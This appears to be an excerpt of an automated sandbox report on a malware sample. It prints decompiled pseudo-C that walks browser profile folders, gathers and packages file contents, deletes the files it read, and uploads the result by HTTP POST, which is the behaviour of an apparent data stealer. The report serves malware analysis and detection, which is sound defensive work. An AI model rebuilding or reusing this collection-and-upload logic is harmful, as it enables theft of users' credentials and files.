							_v76 = _t443;
							_t444 =  *0x40e1e8; // 0x4e5cc0
							_v72 = _t501;
							_t588 = _v20 + _t634 * 0xc;
							_v68 = _t444;
							_v60 = _t501;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t634 = _v12 + 1;
							__eflags = _t634;
							_v12 = _t634;
						}
						_t405 =  *((intOrPtr*)( *0x40e08c))(_v52);
						__eflags = _t405;
						if(_t405 > 0) {
							_t431 = E0040A503(_v52, _t461);
							_t569 =  *0x40e20c; // 0x4e5dc0
							_t433 = E0040A503(E0040A503(_t431, _t569), _v16);
							_t571 =  *0x40e20c; // 0x4e5dc0
							_t501 = E0040A503(E0040A503(_t433, _t571), _v28);
							_t436 =  *0x40e214; // 0x4fe7f0
							_v76 = _t436;
							_t437 =  *0x40e1e8; // 0x4e5cc0
							_v72 = _t435;
							_t588 = _v20 + _t634 * 0xc;
							_v68 = _t437;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t634 = _v12 + 1;
							__eflags = _t634;
							_v12 = _t634;
						}
						E00403C8F(_a8, _v64,  &_v56, _t501, _v44);
						_t644 = _t651 + 0xc;
						__eflags = _t634;
						if(_t634 != 0) {
							L16:
							_t409 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t411 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t564 = 0x10;
							_t412 = E0040A05F(_t409, _t564);
							_v24 = _t412;
							_t414 =  *((intOrPtr*)( *0x40e13c))(_t411,  *0x40e210);
							_t588 = _v24;
							_t415 = E0040A503(_t414, _t588);
							_v88 = _v88 & 0x00000000;
							_v32 = _t415;
							_t416 =  *0x40e204; // 0x4e5e00
							_v92 = _t416;
							_t417 = E00408619( &_v32);
							_v24 = _t417;
							_t636 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
							_t507 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t588, 0xffffffff, 0, 0, 0, 0);
							__eflags = _t507;
							if(_t507 != 0) {
								_t427 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t588, 0xffffffff, _t636, _t507, 0, 0);
								__eflags = _t427;
								if(_t427 != 0) {
									E00407EDB(_v100, _t636, _v12, _v20, _v56, _v64, _v24,  &_v92);
									_t644 = _t644 + 0x18;
								}
							}
							LocalFree(_t636);
							LocalFree(_v24);
							LocalFree(_v32);
							LocalFree(_t588);
							goto L20;
						} else {
							__eflags = _v56 - _t634;
							if(_v56 <= _t634) {
								goto L20;
							}
							goto L16;
						}
					}
				} else {
					PathCombineW(_t461, __ecx, L"Default");
					L22:
					_t589 = _t588 | 0xffffffff;
					_v48 = _t589;
					do {
						_t286 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
						_v16 = _t286;
						_t617 =  *((intOrPtr*)( *0x40e044))(0x40, 0x80);
						_v88 = _t617;
						if(_t589 != 0xffffffff) {
							wsprintfW(_t617, L"Profile %d", _t589);
							_t644 = _t644 + 0xc;
						} else {
							_t617 =  *((intOrPtr*)( *0x40e13c))(_t617, L"Default");
							_v88 = _t617;
						}
						PathCombineW(_t461, _v96, _t617);
						_t292 = FindFirstFileW(_t461,  &_v744); // executed
						_t655 = _t292 - 0xffffffff;
						if(_t292 != 0xffffffff) {
							_t591 = 0x40;
							_t302 = LocalAlloc(_t591, ??); // executed
							_v24 = _t302;
							_t304 = LocalAlloc(_t591, 0x200000); // executed
							_v64 = _t304;
							_t306 = LocalAlloc(_t591, 0x800000); // executed
							_v36 = _t306;
							_t308 = LocalAlloc(_t591, 0x400000); // executed
							_v84 = _v84 + 1;
							_v12 = _v12 & 0x00000000;
							_v60 = _v60 & 0x00000000;
							_v32 = _t308;
							_t310 =  *((intOrPtr*)( *0x40e044))(_t591, 0x400, 0x200000);
							_v20 = _t310;
							_t312 =  *((intOrPtr*)( *0x40e044))(_t591, 0x1000);
							_v40 = _t312;
							E00401C87(_v96, _t617,  &_v44,  &_v80,  &_v28, _a12); // executed
							_t592 = _v80;
							_t618 = _v44;
							E004027B8( &_v24,  &_v16, _t655, _v96, _v44, _v80, _a4); // executed
							E00402CB8( &_v36,  &_v16, _t655,  &_v24, _v44, _v80, _a4); // executed
							E00403760( &_v32, _t618, _a4); // executed
							_t470 =  &_v64;
							E00403236( &_v64,  &_v16, _t655,  &_v32, _t618, _t592, _a4); // executed
							_t648 = _t644 + 0x48;
							_t321 = lstrlenW( *0x40e21c);
							_t322 = _v36;
							_v52 = _t322;
							if(lstrlenW(_t322) >= _t321) {
								_t382 = E0040A503(_v52, _t461);
								_t556 =  *0x40e20c; // 0x4e5dc0
								_t384 = E0040A503(E0040A503(_t382, _t556), _v16);
								_t558 =  *0x40e20c; // 0x4e5dc0
								_t470 = E0040A503(E0040A503(_t384, _t558), _v28);
								_v12 = 1;
								_t387 =  *0x40e220; // 0x4f8650
								_v112 = _t387;
								_t388 =  *0x40e1e8; // 0x4e5cc0
								_v108 = _t470;
								_v104 = _t388;
								asm("movsd");
								_v52 = _t470;
								asm("movsd");
								asm("movsd");
							}
							_t324 = lstrlenW( *0x40e1a4);
							_t325 = _v24;
							_v56 = _t325;
							if(lstrlenW(_t325) < _t324) {
								_t621 = _v12;
							} else {
								_t375 = E0040A503(_v56, _t461);
								_t551 =  *0x40e20c; // 0x4e5dc0
								_t377 = E0040A503(E0040A503(_t375, _t551), _v16);
								_t553 =  *0x40e20c; // 0x4e5dc0
								_t470 = E0040A503(E0040A503(_t377, _t553), _v28);
								_t380 =  *0x40e1d8; // 0x4fec10
								_v124 = _t380;
								_t381 =  *0x40e1e8; // 0x4e5cc0
								_v120 = _t470;
								_v116 = _t381;
								_v56 = _t470;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t621 = _v12 + 1;
								_v12 = _t621;
							}
							_t595 = _v32;
							_push(_t595);
							_v32 = _t595;
							if( *((intOrPtr*)( *0x40e08c))() > 0) {
								_t368 = E0040A503(_t595, _t461);
								_t546 =  *0x40e20c; // 0x4e5dc0
								_t370 = E0040A503(E0040A503(_t368, _t546), _v16);
								_t548 =  *0x40e20c; // 0x4e5dc0
								_t470 = E0040A503(E0040A503(_t370, _t548), _v28);
								_t373 =  *0x40e22c; // 0x4ff150
								_v136 = _t373;
								_t374 =  *0x40e1e8; // 0x4e5cc0
								_v132 = _t470;
								_v128 = _t374;
								_v32 = _t470;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t621 = _v12 + 1;
								_v12 = _t621;
							}
							_push(_v64);
							if( *((intOrPtr*)( *0x40e08c))() > 0) {
								_t361 = E0040A503(_v64, _t461);
								_t541 =  *0x40e20c; // 0x4e5dc0
								_t363 = E0040A503(E0040A503(_t361, _t541), _v16);
								_t543 =  *0x40e20c; // 0x4e5dc0
								_t470 = E0040A503(E0040A503(_t363, _t543), _v28);
								_t366 =  *0x40e214; // 0x4fe7f0
								_v148 = _t366;
								_t367 =  *0x40e1e8; // 0x4e5cc0
								_v144 = _t365;
								_v140 = _t367;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t621 = _v12 + 1;
								_v12 = _t621;
							}
							E00403C8F(_a8, _v40,  &_v60, _t470, _v44); // executed
							_t644 = _t648 + 0xc;
							if(_t621 != 0 || _v60 > _t621) {
								_t334 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t336 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t536 = 0x10;
								_t337 = E0040A05F(_t334, _t536);
								_v36 = _t337;
								_t339 =  *((intOrPtr*)( *0x40e13c))(_t336,  *0x40e210);
								_t598 = _v36;
								_t340 = E0040A503(_t339, _t598);
								_v68 = _v68 & 0x00000000;
								_v24 = _t340;
								_t341 =  *0x40e204; // 0x4e5e00
								_v72 = _t341;
								_t342 = E00408619( &_v24);
								_v36 = _t342;
								_t623 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
								_t476 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t598, 0xffffffff, 0, 0, 0, 0);
								if(_t476 != 0) {
									_push(0);
									_push(0);
									_push(_t476);
									_push(_t623);
									_push(0xffffffff);
									_push(_t598);
									_push(0);
									_push(0xfde9);
									if( *((intOrPtr*)( *0x40e0e4))() != 0) {
										E00407EDB(_v100, _t623, _v12, _v20, _v60, _v40, _v36,  &_v72); // executed
										_t644 = _t644 + 0x18;
									}
								}
								LocalFree(_t623);
								LocalFree(_v36);
								LocalFree(_v24);
								LocalFree(_t598);
							}
							LocalFree(_v56); // executed
							LocalFree(_v52);
							LocalFree(_v32); // executed
							LocalFree(_v20);
							LocalFree(_v40);
							_t617 = _v88;
							_t589 = _v48;
						}
						LocalFree(_t617);
						_t294 = _v16;
						if(_t294 != 0) {
							LocalFree(_t294);
						}
						_t589 = _t589 + 1;
						_v48 = _t589;
					} while (_t589 < 0x64);
					LocalFree(_t461);
					LocalFree(_v44);
					LocalFree(_v28);
					LocalFree(_v80);
					return _v84;
				}
			}

0x00401e2d
0x00401e30
0x00401e33
0x00401e3c
0x00401e3f
0x00401e46
0x00401e4e
0x00401e55
0x00401e5e
0x00401e65
0x00401e74
0x00401e77
0x00401e9a
0x00401ea3
0x00401ea5
0x00401ea8
0x00000000
0x00401eaa
0x00401ebc
0x00401ec3
0x00401ecc
0x00401ed3
0x00401edc
0x00401ee3
0x00401ee6
0x00401eef
0x00401ef6
0x00401eff
0x00401f06
0x00401f09
0x00401f12
0x00401f14
0x00401f18
0x00401f1c
0x00401f1f
0x00401f2a
0x00401f33
0x00401f3a
0x00401f4d
0x00401f5c
0x00401f61
0x00401f64
0x00401f66
0x004022a7
0x004022aa
0x004022b3
0x004022bc
0x004022c5
0x004022ce
0x004022d7
0x004022dd
0x004022e0
0x004022e2
0x004022e5
0x004022e5
0x00000000
0x00401f6c
0x00401f6f
0x00401f75
0x00401f7e
0x00401f92
0x00401f9e
0x00401faf
0x00401fb2
0x00401fbd
0x00401fc6
0x00401fca
0x00401fce
0x00401fd1
0x00401fd3
0x00401fd5
0x00401fdc
0x00401fe1
0x00401ff3
0x00401ff8
0x00402015
0x00402017
0x0040201e
0x00402023
0x00402026
0x0040202b
0x0040202e
0x00402031
0x00402032
0x00402035
0x00402036
0x00402036
0x00402043
0x00402047
0x0040204b
0x0040204e
0x00402050
0x00402052
0x004020ba
0x00402054
0x00402059
0x0040205e
0x00402070
0x00402075
0x00402093
0x00402095
0x0040209a
0x0040209d
0x004020a2
0x004020a8
0x004020ab
0x004020ae
0x004020af
0x004020b0
0x004020b4
0x004020b5
0x004020b5
0x004020bd
0x004020c6
0x004020c9
0x004020cb
0x004020cd
0x004020d3
0x004020d8
0x004020ea
0x004020ef
0x00402109
0x0040210b
0x00402113
0x00402116
0x0040211b
0x0040211e
0x00402121
0x00402124
0x00402127
0x00402128
0x00402129
0x0040212d
0x0040212d
0x0040212e
0x0040212e
0x00402139
0x0040213b
0x0040213d
0x00402144
0x00402149
0x0040215b
0x00402160
0x0040217a
0x0040217c
0x00402184
0x00402187
0x0040218c
0x0040218f
0x00402192
0x00402195
0x00402196
0x00402197
0x0040219b
0x0040219b
0x0040219c
0x0040219c
0x004021ad
0x004021b2
0x004021b5
0x004021b7
0x004021c2
0x004021cf
0x004021db
0x004021df
0x004021e4
0x004021ef
0x004021f8
0x004021fa
0x00402201
0x00402206
0x0040220d
0x00402210
0x00402215
0x00402218
0x00402222
0x00402230
0x00402246
0x00402248
0x0040224a
0x00402260
0x00402262
0x00402264
0x0040227f
0x00402284
0x00402284
0x00402264
0x00402288
0x00402291
0x0040229a
0x004022a1
0x00000000
0x004021b9
0x004021b9
0x004021bc
0x00000000
0x00000000
0x00000000
0x004021bc
0x004021b7
0x00401e79
0x00401e80
0x004022eb
0x004022eb
0x004022ee
0x004022f1
0x004022fd
0x00402304
0x00402310
0x00402312
0x00402318
0x00402335
0x0040233b
0x0040231a
0x00402327
0x00402329
0x00402329
0x00402343
0x00402356
0x00402358
0x0040235b
0x0040236d
0x0040236f
0x00402376
0x0040237f
0x00402386
0x0040238f
0x00402396
0x0040239f
0x004023a1
0x004023a4
0x004023a8
0x004023b1
0x004023ba
0x004023c1
0x004023ca
0x004023d4
0x004023e3
0x004023e8
0x004023ee
0x004023fd
0x00402411
0x0040241d
0x0040242e
0x00402431
0x0040243c
0x00402445
0x00402449
0x0040244d
0x00402454
0x0040245b
0x00402460
0x00402472
0x00402477
0x00402494
0x00402496
0x0040249d
0x004024a2
0x004024a5
0x004024aa
0x004024ad
0x004024b0
0x004024b1
0x004024b4
0x004024b5
0x004024b5
0x004024c2
0x004024c6
0x004024ca
0x004024d1
0x00402539
0x004024d3
0x004024d8
0x004024dd
0x004024ef
0x004024f4
0x00402512
0x00402514
0x00402519
0x0040251c
0x00402521
0x00402527
0x0040252a
0x0040252d
0x0040252e
0x0040252f
0x00402533
0x00402534
0x00402534
0x0040253c
0x00402544
0x00402545
0x0040254c
0x00402552
0x00402557
0x00402569
0x0040256e
0x00402588
0x0040258a
0x00402595
0x0040259b
0x004025a0
0x004025a6
0x004025a9
0x004025ac
0x004025ad
0x004025ae
0x004025b2
0x004025b3
0x004025b3
0x004025b6
0x004025c2
0x004025c9
0x004025ce
0x004025e0
0x004025e5
0x004025ff
0x00402601
0x0040260c
0x00402612
0x00402617
0x00402620
0x00402626
0x00402627
0x00402628
0x0040262c
0x0040262d
0x0040262d
0x0040263e
0x00402643
0x00402648
0x00402660
0x0040266c
0x00402670
0x00402675
0x00402680
0x00402689
0x0040268b
0x00402692
0x00402697
0x0040269e
0x004026a1
0x004026a6
0x004026a9
0x004026b3
0x004026c1
0x004026d7
0x004026db
0x004026e4
0x004026e5
0x004026e6
0x004026e7
0x004026e8
0x004026ea
0x004026eb
0x004026ec
0x004026f5
0x00402710
0x00402715
0x00402715
0x004026f5
0x00402719
0x00402722
0x0040272b
0x00402732
0x00402732
0x0040273b
0x00402744
0x0040274d
0x00402756
0x0040275f
0x00402765
0x00402768
0x00402768
0x0040276c
0x00402772
0x00402777
0x0040277a
0x0040277a
0x00402780
0x00402781
0x00402784
0x0040278e
0x00402797
0x004027a0
0x004027aa
0x00000000
0x004027b0

APIs

PathCombineW.SHLWAPI(00000000,00000000,Default), ref: 00401E80
wsprintfW.USER32 ref: 00402335
PathCombineW.SHLWAPI(00000000,?,00000000), ref: 00402343
FindFirstFileW.KERNEL32(00000000,?), ref: 00402356
LocalAlloc.KERNEL32(00000040,00200000), ref: 0040236F
LocalAlloc.KERNEL32(00000040,00200000), ref: 0040237F
LocalAlloc.KERNEL32(00000040,00800000), ref: 0040238F
LocalAlloc.KERNEL32(00000040,00400000), ref: 0040239F
lstrlenW.KERNEL32 ref: 00402445
lstrlenW.KERNEL32(?), ref: 00402450
lstrlenW.KERNEL32 ref: 004024C2
lstrlenW.KERNEL32(?), ref: 004024CD

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 00402719
LocalFree.KERNEL32(?), ref: 00402722
LocalFree.KERNEL32(?), ref: 0040272B
LocalFree.KERNEL32(?), ref: 00402732
LocalFree.KERNELBASE(00000000), ref: 0040273B
LocalFree.KERNEL32(?), ref: 00402744
LocalFree.KERNELBASE(?), ref: 0040274D
LocalFree.KERNEL32(00000000), ref: 00402756
LocalFree.KERNEL32(?), ref: 0040275F
LocalFree.KERNEL32(00000000), ref: 0040276C
LocalFree.KERNEL32(?), ref: 0040277A
LocalFree.KERNEL32(00000000), ref: 0040278E
LocalFree.KERNEL32(?), ref: 00402797
LocalFree.KERNEL32(?), ref: 004027A0
LocalFree.KERNEL32(?), ref: 004027AA

Strings

Default, xrefs: 00401E79, 0040231F
Profile %d, xrefs: 0040232F
8{@, xrefs: 00401E18

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$lstrlen$Alloc$CombinePath$FileFindFirstGlobalwsprintf
String ID: 8{@$Default$Profile %d
API String ID: 3768013767-2475470199
Opcode ID: 65ecfa7065253902dcf107738d78f9766527f115974b6ff76e638b2714d6a83a
Instruction ID: 449fa844226801038b1647cac7188c5dd728cedc2e0ff5267019116776c59555
Opcode Fuzzy Hash: 65ecfa7065253902dcf107738d78f9766527f115974b6ff76e638b2714d6a83a
Instruction Fuzzy Hash: 30627071E00218AFDF04DFA6DE45AAEBBB5FF88310F10442AF914B7391DB7499118B99

Uniqueness

Uniqueness Score: -1.00%

Function 00407EDB Relevance: 63.5, APIs: 32, Strings: 4, Instructions: 477
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00407EDB(short* __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, LPCWSTR* _a24) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				void _v44;
				void _v48;
				WCHAR* _v52;
				void* _t106;
				void* _t109;
				void* _t112;
				signed int _t113;
				signed int _t115;
				void* _t119;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t128;
				void* _t129;
				void* _t131;
				void* _t132;
				long _t148;
				void* _t164;
				void* _t166;
				long _t168;
				long _t169;
				signed int _t174;
				long _t178;
				void* _t179;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				int _t198;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;
				void* _t223;
				void* _t224;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t229;
				intOrPtr* _t281;
				void* _t282;
				intOrPtr _t285;
				intOrPtr _t286;
				intOrPtr _t288;
				intOrPtr _t293;
				intOrPtr _t294;
				intOrPtr _t296;
				intOrPtr _t297;
				intOrPtr _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				intOrPtr _t303;
				intOrPtr _t306;
				intOrPtr _t308;
				intOrPtr _t309;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr _t315;
				intOrPtr _t317;
				void* _t318;
				signed int _t319;
				void* _t320;
				void* _t321;
				void* _t323;
				void* _t326;
				short* _t327;
				signed short* _t328;
				void* _t329;
				void* _t331;
				WCHAR* _t333;
				void** _t338;
				void* _t339;

				_v20 = __edx;
				_t327 = __ecx; // executed
				_t106 = LocalAlloc(0x40, 0xc350);
				_t281 =  *0x40e044; // 0x74cb5850
				_t224 = _t106;
				_v24 = _t224;
				_t318 =  *_t281(0x40, 0x208);
				_v28 = _t318;
				if( *_t327 != 0x68) {
					L14:
					return 0;
				}
				_t109 = 0x74;
				if( *((intOrPtr*)(_t327 + 2)) != _t109 ||  *((intOrPtr*)(_t327 + 4)) != _t109 ||  *((short*)(_t327 + 6)) != 0x70) {
					goto L14;
				} else {
					_t7 = _t327 + 8; // 0x4589d0ff
					_v32 =  *_t7 & 0x0000ffff;
					_t112 =  *((intOrPtr*)( *0x40e18c))(_t327,  *0x40e3ec);
					_v16 = 0x2f;
					_t282 = 0;
					_t10 = _t112 + 6; // 0x6
					_t328 = _t10;
					_t113 =  *_t328 & 0x0000ffff;
					_t229 = _t113;
					if(_t113 == _v16) {
						L7:
						_t115 =  *((intOrPtr*)( *0x40e08c))(_t318);
						_t319 = _a4;
						_v52 =  &(_t328[_t115]);
						_t119 = LocalAlloc(0x40, _t319 << 0x15); // executed
						_v8 = _t119;
						if(_t319 <= 0) {
							L11:
							_v16 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v8, 0xffffffff, 0, 0, 0, 0);
							_t122 = LocalAlloc(0x40, _t319 << 0x14); // executed
							_t329 = _t122;
							_t123 = LocalAlloc(0x40, _t319 + _a12 << 0x14); // executed
							_v12 = _t123;
							_t320 = _t123;
							_t124 = _v16;
							if(_t124 == 0) {
								L19:
								LocalFree(_v8);
								LocalFree(_t329); // executed
								if(_a12 <= 0) {
									L32:
									_t128 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
									_t285 =  *0x40e3dc; // 0x504ea8
									_t129 = E0040A55D(_t128, _t285);
									_t286 =  *0x40e43c; // 0x504cd8
									_t131 = E0040A55D(E0040A55D(_t129, _t286), _v20);
									_t288 =  *0x40e43c; // 0x504cd8
									_t132 = E0040A55D(_t131, _t288);
									_v20 = _t132;
									_push( *((intOrPtr*)( *0x40e198))(_t132) + 1);
									_push(_v20);
									_push(_t320);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _t320 +  *((intOrPtr*)( *0x40e198))(_v20);
									}
									LocalFree(_v20);
									_v44 = 0x927c0;
									_v48 = 0x927c0;
									_t331 =  *((intOrPtr*)( *0x40e124))(L"rqwrwqrqwrqw", 0, 0, 0, 0);
									_v36 = _t331;
									InternetSetOptionW(_t331, 6,  &_v44, 4);
									InternetSetOptionW(_t331, 5,  &_v48, 4);
									if(_t331 == 0) {
										L45:
										_t333 = MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(0) + 1, _t224, 0);
										_v52 = _t333;
										_t148 = _t333 + _t333;
										_v40 = _t148;
										_t321 =  *((intOrPtr*)( *0x40e044))(0x40, _t148);
										if(_t333 != 0) {
											MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(_v52) + 1, _t224, _t321);
											 *((short*)(_v40 + _t321 - 2)) = 0;
										}
										if(_t321 != 0) {
											LocalFree(_t321);
										}
										LocalFree(_v28);
										LocalFree(_t224); // executed
										LocalFree(_v12); // executed
										return 1;
									} else {
										_t162 =  ==  ? 0x1bb : 0;
										_t163 = ( ==  ? 0x1bb : 0) & 0x0000ffff;
										_t164 =  *((intOrPtr*)( *0x40e180))(_t331, _v28, ( ==  ? 0x1bb : 0) & 0x0000ffff, 0x73, 0x50, 0, 0, 3, 0, 1);
										_v20 = _t164;
										if(_t164 == 0) {
											L44:
											InternetCloseHandle(_t331);
											goto L45;
										}
										_push(1);
										_v40 = 0xc00000;
										_t248 =  ==  ? _v40 : 0x400000;
										_t166 = HttpOpenRequestW(_t164,  *0x40e25c, _v52, 0, 0, _a24,  ==  ? _v40 : 0x400000, 0x73); // executed
										_t224 = _v24;
										_v52 = _t166;
										if(_t166 == 0) {
											L43:
											InternetCloseHandle(_v20);
											goto L44;
										}
										_t168 = _v12;
										_t169 =  *((intOrPtr*)( *0x40e08c))(_t320 - _t168);
										_t323 = _v52;
										if(HttpSendRequestW(_t323, _a20, _t169, _a20, _t168) == 0) {
											L42:
											InternetCloseHandle(_t323); // executed
											_t331 = _v36;
											goto L43;
										}
										while(1) {
											_push( &_v32);
											_push(0xc350);
											_push(_t224);
											_push(_t323);
											if( *((intOrPtr*)( *0x40e0fc))() == 0) {
												goto L42;
											}
											_t174 = _v32;
											if(_t174 == 0) {
												goto L42;
											}
											 *((char*)(_t224 + _t174)) = 0;
										}
										goto L42;
									}
								}
								_t226 = _a12;
								_t338 = _a16 + 4;
								do {
									_t178 =  *((intOrPtr*)( *0x40e14c))( *_t338, 0);
									_v36 = _t178;
									_t49 = _t178 + 0x400; // 0x400
									_t179 =  *((intOrPtr*)( *0x40e044))(0x40, _t49);
									_t293 =  *0x40e3dc; // 0x504ea8
									_t180 = E0040A55D(_t179, _t293);
									_t294 =  *0x40e43c; // 0x504cd8
									_t182 = E0040A55D(E0040A55D(_t180, _t294), _v20);
									_t296 =  *0x40e3dc; // 0x504ea8
									_t183 = E0040A55D(_t182, _t296);
									_t297 =  *0x40e444; // 0x500410
									_t186 = E0040A55D(E0040A55D(E0040A55D(_t183, _t297),  *(_t338 - 4)), "\"");
									_t300 =  *0x40e3dc; // 0x504ea8
									_t187 = E0040A55D(_t186, _t300);
									_t301 =  *0x40e3f0; // 0x4f8710
									_t188 = E0040A55D(_t187, _t301);
									_t302 =  *0x40e3dc; // 0x504ea8
									_t189 = E0040A55D(_t188, _t302);
									_t303 =  *0x40e3dc; // 0x504ea8
									_t190 = E0040A55D(_t189, _t303);
									_v16 = _t190;
									_t191 =  *((intOrPtr*)( *0x40e198))(_t190);
									_v8 = _t191;
									_t54 = _t191 + 1; // 0x1
									_push(_v16);
									_push(_t320);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _t320 + _v8;
										if( *_t338 != 0) {
											_t198 = ReadFile( *_t338, _t320, _v36,  &_v40, 0); // executed
											if(_t198 != 0) {
												_t320 = _t320 + _v40;
											}
											CloseHandle( *_t338);
										}
									}
									if( *(_t338 - 4) != 0) {
										LocalFree( *(_t338 - 4));
									}
									if(_t338[1] != 0) {
										DeleteFileW(_t338[1]); // executed
										LocalFree(_t338[1]);
									}
									LocalFree(_v16);
									_t338 =  &(_t338[4]);
									_t226 = _t226 - 1;
								} while (_t226 != 0);
								_t224 = _v24;
								goto L32;
							}
							_push(0);
							_push(0);
							_push(_t124);
							_push(_t329);
							_push(0xffffffff);
							_push(_v8);
							_push(0);
							_push(0xfde9);
							if( *((intOrPtr*)( *0x40e0e4))() != 0) {
								_push(_t329);
								if( *((intOrPtr*)( *0x40e198))() > 0) {
									_push(_v16);
									_push(_t329);
									_push(_v12);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _v16 - 1 + _v12;
									}
								}
								goto L19;
							}
							LocalFree(_v8);
							LocalFree(_t224);
							LocalFree(_t329);
							LocalFree(_v28);
							goto L14;
						} else {
							_t227 = _a8;
							_v16 = _t319;
							_t326 = _t119;
							do {
								_t209 = E0040A4C2(_v20);
								_t306 =  *0x40e3f8; // 0x4e5c00
								_t339 = _t209; // executed
								_t210 = E0040A503(_t326, _t306); // executed
								_t211 = E0040A503(_t210, _t339);
								_t308 =  *0x40e350; // 0x4e5b20
								_t212 = E0040A503(_t211, _t308);
								_t309 =  *0x40e340; // 0x506358
								_t215 = E0040A503(E0040A503(E0040A503(_t212, _t309),  *_t227), "\"");
								_t312 =  *0x40e350; // 0x4e5b20
								_t216 = E0040A503(_t215, _t312);
								_t313 =  *0x40e35c; // 0x5062f8
								_t217 = E0040A503(_t216, _t313);
								_t314 =  *0x40e350; // 0x4e5b20
								_t218 = E0040A503(_t217, _t314);
								_t315 =  *0x40e350; // 0x4e5b20
								_t220 = E0040A503(E0040A503(_t218, _t315),  *((intOrPtr*)(_t227 + 4)));
								_t317 =  *0x40e350; // 0x4e5b20
								_t221 = E0040A503(_t220, _t317); // executed
								_t326 = _t221;
								LocalFree(_t339);
								_t25 =  &_v16;
								 *_t25 = _v16 - 1;
								_t227 = _t227 + 0xc;
							} while ( *_t25 != 0);
							_t224 = _v24;
							_v8 = _t326;
							_t319 = _a4;
							goto L11;
						}
					} else {
						_t223 = 0;
						do {
							_t282 = _t282 + 1;
							 *(_t223 + _t318) = _t229;
							_t223 = _t282 + _t282;
							_t229 =  *(_t223 + _t328) & 0x0000ffff;
						} while (_t229 != _v16);
						goto L7;
					}
				}
			}

0x00407ef0
0x00407ef3
0x00407ef5
0x00407ef7
0x00407efd
0x00407f06
0x00407f0f
0x00407f11
0x00407f14
0x004080f3
0x00000000
0x004080f3
0x00407f1c
0x00407f21
0x00000000
0x00407f3c
0x00407f3c
0x00407f46
0x00407f4f
0x00407f51
0x00407f58
0x00407f5a
0x00407f5a
0x00407f5d
0x00407f60
0x00407f66
0x00407f7c
0x00407f82
0x00407f84
0x00407f90
0x00407f9b
0x00407f9d
0x00407fa2
0x00408069
0x0040808f
0x00408092
0x00408097
0x004080a8
0x004080aa
0x004080ad
0x004080af
0x004080b4
0x0040811f
0x00408122
0x00408129
0x00408133
0x00408275
0x00408281
0x00408283
0x0040828b
0x00408290
0x004082a2
0x004082a7
0x004082af
0x004082c1
0x004082c7
0x004082c8
0x004082cb
0x004082d0
0x004082dc
0x004082dc
0x004082e1
0x004082f2
0x004082f5
0x00408304
0x0040830f
0x00408312
0x00408321
0x00408329
0x00408406
0x0040842a
0x0040842c
0x0040842f
0x00408435
0x0040843a
0x0040843e
0x0040845d
0x00408464
0x00408464
0x0040846b
0x0040846e
0x0040846e
0x00408477
0x0040847e
0x00408487
0x00000000
0x0040832f
0x0040834d
0x00408350
0x00408358
0x0040835a
0x0040835f
0x004083ff
0x00408400
0x00000000
0x00408400
0x00408365
0x00408379
0x00408380
0x00408396
0x00408398
0x0040839b
0x004083a0
0x004083f6
0x004083f9
0x00000000
0x004083f9
0x004083a2
0x004083b8
0x004083ba
0x004083c6
0x004083ec
0x004083ed
0x004083f3
0x00000000
0x004083f3
0x004083da
0x004083e2
0x004083e3
0x004083e4
0x004083e5
0x004083ea
0x00000000
0x00000000
0x004083cf
0x004083d4
0x00000000
0x00000000
0x004083d6
0x004083d6
0x00000000
0x004083da
0x00408329
0x0040813c
0x0040813f
0x00408142
0x0040814b
0x00408153
0x00408156
0x0040815f
0x00408161
0x00408169
0x0040816e
0x00408180
0x00408185
0x0040818d
0x00408192
0x004081b0
0x004081b5
0x004081bd
0x004081c2
0x004081ca
0x004081cf
0x004081d7
0x004081dc
0x004081e4
0x004081f0
0x004081f3
